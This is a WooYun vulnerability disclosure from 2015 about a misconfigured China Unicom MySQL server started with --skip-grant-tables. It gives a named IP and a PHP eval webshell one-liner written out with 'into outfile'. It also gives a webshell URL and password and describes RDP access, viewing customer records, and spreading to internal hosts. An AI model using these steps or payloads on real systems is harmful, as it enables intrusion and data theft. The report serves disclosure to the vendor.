当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114778

漏洞标题:中国联通某处Mysql配置不当引发的问题(涉及联通电子工单系统、泛微协同办公、智能综合办公系统)

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-05-18 16:19

修复时间:2015-07-06 19:20

公开时间:2015-07-06 19:20

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

由于管理员疏忽导致mysql以 --skip-grant-tables 参数启动
可以控制联通电子工单系统(内含几十万客户信息)
泛微协同办公
智能综合办公系统

详细说明:

相关单位,吉林省延边州联通,由于管理员疏忽导致mysql以 --skip-grant-tables 参数启动,导致可以使用任意账户登录mysql服务器,进而可以mysql into outfile一句话webshell
系统地址
工单系统

http://202.111.175.199/system/login.php


泛微

http://202.111.175.199:8888/login.php


智能综合办公系统
http://202.111.175.199:8000/

漏洞证明:

端口扫描

202.111.175.199


0.png


扫描到了3306和3336端口,对其进行简单弱口令测试后发现可以登录3336端口,以任意身份登录

捕获.PNG


通过mysql导出一句话到大马
导出一句话

select "<?php @eval($_POST['pass']);?>" into outfile 'D:/www/wooyun.php';


然后利用小马上传webshell
地址

http://202.111.175.199/inf0.php

密码angel
进而利用system权限webshell获取administrator密码登录3389

捕获.PNG


利用管理员留存的mysql管理器我们看看里面有什么

捕获.PNG


通过分析该服务器得知数据库

xin

为工单系统数据库
获取管理员密码登录工单系统

捕获.PNG


查看客户信息

捕获.PNG


进入详情

捕获2.PNG


泛微和通达OA就不进行登录演示了,虽然我解不开管理员密码,但是我都有服务端了,我可以重置它密码。
泛微和通达OA里面的信息可能会涉及联通一些敏感业务,所以也就不再继续了!
顺便利用相似口令我们还可以登录内网的
192.168.0.4

捕获2.PNG


192.168.0.5

捕获.PNG

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-05-22 19:19

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置。

最新状态:

暂无